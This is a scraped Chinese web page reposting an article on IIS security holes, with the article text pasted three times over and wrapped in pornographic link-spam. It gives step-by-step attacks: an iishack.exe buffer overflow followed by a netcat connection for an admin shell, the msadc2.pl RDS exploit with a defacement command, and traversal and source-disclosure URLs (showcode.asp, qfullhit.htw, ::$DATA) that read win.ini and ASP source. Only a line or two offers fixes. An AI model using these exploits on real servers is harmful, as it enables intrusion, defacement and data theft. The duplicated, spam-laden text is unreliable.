亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 網站 > IIS > 正文

IIS的十七個常見安全漏洞

2024-08-29 03:09:33
字體:
來源:轉載
供稿:網友

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的Web服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來連接你要檢測的服務器:

c:>nc 80

如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

2.msadc

IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u </hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的Web服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來連接你要檢測的服務器:

c:>nc 80

如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

2.msadc

IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u </hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的Web服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來連接你要檢測的服務器:

c:>nc 80

如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

2.msadc

IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u </hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
91超碰caoporn97人人| 国产亚洲成精品久久| 2019日本中文字幕| 欧美性猛交xxxx免费看| 久久久精品久久久| 亚洲人成网站在线播| 亚洲一区二区三区香蕉| 亚洲欧美一区二区精品久久久| 亚洲精品aⅴ中文字幕乱码| 日韩免费视频在线观看| 国产91精品高潮白浆喷水| 久久国产精品久久久| 欧美日韩在线视频首页| 亚洲成人av片| 欧美成人午夜视频| 久久精品色欧美aⅴ一区二区| 成人中心免费视频| 久久精品亚洲一区| 国产综合福利在线| 国产成人在线一区二区| 欧美国产中文字幕| 亚洲无限乱码一二三四麻| 欧美多人爱爱视频网站| 亚洲综合在线播放| 国产一区二区色| 91香蕉嫩草影院入口| 91在线国产电影| 国外成人性视频| 国产精品亚洲第一区| 91精品在线播放| 久久噜噜噜精品国产亚洲综合| 这里只有精品在线播放| 精品久久久一区| 亚洲护士老师的毛茸茸最新章节| 国产成人+综合亚洲+天堂| 日本久久久久久| 精品久久久久久久久久| 国内外成人免费激情在线视频网站| 久久综合九色九九| 国产偷国产偷亚洲清高网站| 亚洲a∨日韩av高清在线观看| 亚洲精品久久久久国产| 国产免费观看久久黄| 国产精品高潮呻吟视频| 久久久久久久久久婷婷| 日韩av有码在线| 日日噜噜噜夜夜爽亚洲精品| 国产精品第100页| 亚洲第一网中文字幕| 久久在精品线影院精品国产| 久久国产精品久久久久久| 亚洲国产成人在线播放| 久久久人成影片一区二区三区| 91免费精品国偷自产在线| 久久精品久久久久电影| 亚洲va欧美va国产综合剧情| 日韩男女性生活视频| 色播久久人人爽人人爽人人片视av| 精品国产一区二区三区久久| 欧美精品国产精品日韩精品| 久久精品视频在线| 啪一啪鲁一鲁2019在线视频| 欧美大尺度电影在线观看| 国产日本欧美一区二区三区在线| 奇米4444一区二区三区| 久久国产精品视频| 中文字幕日韩综合av| 日韩精品在线私人| 2019中文字幕在线免费观看| 欧美福利视频在线观看| 国产91在线高潮白浆在线观看| 亚洲国产精品va在线看黑人动漫| 亚洲最大福利网| 亚洲最大av网| 国产日韩欧美在线播放| 成人免费淫片aa视频免费| 欧美成年人网站| 国产精品观看在线亚洲人成网| 黄色一区二区在线观看| 在线亚洲午夜片av大片| 国产精品96久久久久久| 亚洲午夜女主播在线直播| 国产精品黄视频| 欧美最猛性xxxxx(亚洲精品)| 国产精品入口福利| 国产日韩欧美自拍| 色综合久久天天综线观看| 亚洲精品456在线播放狼人| 97av在线播放| 久久精品视频中文字幕| 美女视频久久黄| 97免费中文视频在线观看| 久久亚洲精品视频| 精品国产一区二区在线| 色777狠狠综合秋免鲁丝| 国产女人18毛片水18精品| 日韩成人免费视频| 国产精品久久久久久五月尺| 欧美一性一乱一交一视频| 51精品国产黑色丝袜高跟鞋| 日本中文字幕不卡免费| 中文字幕日韩欧美在线| 国产一区二区三区日韩欧美| 精品欧美国产一区二区三区| 久久久久久久999精品视频| 国产精品电影一区| 欧美老女人xx| 日韩av电影在线网| 久久精品99久久久久久久久| 伊人久久综合97精品| 色婷婷综合成人| 日韩av三级在线观看| 成人国产亚洲精品a区天堂华泰| 中文字幕久久精品| 国产亚洲成av人片在线观看桃| 丝袜亚洲另类欧美重口| 亚洲精品一区二区在线| 国产成人福利视频| 亚洲午夜久久久久久久| www.欧美免费| 中文字幕不卡在线视频极品| 国产欧美日韩最新| 国产在线视频一区| 欧美一级电影免费在线观看| 欧美理论片在线观看| 91国产美女在线观看| 伊人久久免费视频| 狠狠综合久久av一区二区小说| 亚洲精品在线不卡| 欧美超级乱淫片喷水| 久久全国免费视频| 国产一区二区三区欧美| 亚洲精品wwww| 欧美极品美女视频网站在线观看免费| 国产欧美日韩视频| 91精品国产高清久久久久久久久| 国产精品视频久久| 久久这里只有精品99| 日韩av在线天堂网| 久久这里有精品| 欧美激情久久久| 高跟丝袜一区二区三区| 欧美在线精品免播放器视频| 国产成人精品免费视频| 日韩免费高清在线观看| 97视频色精品| 久久香蕉国产线看观看网| 欧美黑人巨大xxx极品| 狠狠色狠狠色综合日日五| 美日韩精品视频免费看| 欧美人与性动交| 欧美夫妻性生活xx| 成人免费网视频| 中文字幕精品国产| 97超级碰碰碰| 成人网在线免费看| 69影院欧美专区视频| 欧美激情精品久久久久| 国产69精品久久久久9999| 日韩中文第一页| 日本三级久久久| 亚洲欧美制服综合另类| 中文字幕久热精品视频在线| 国产精品影片在线观看|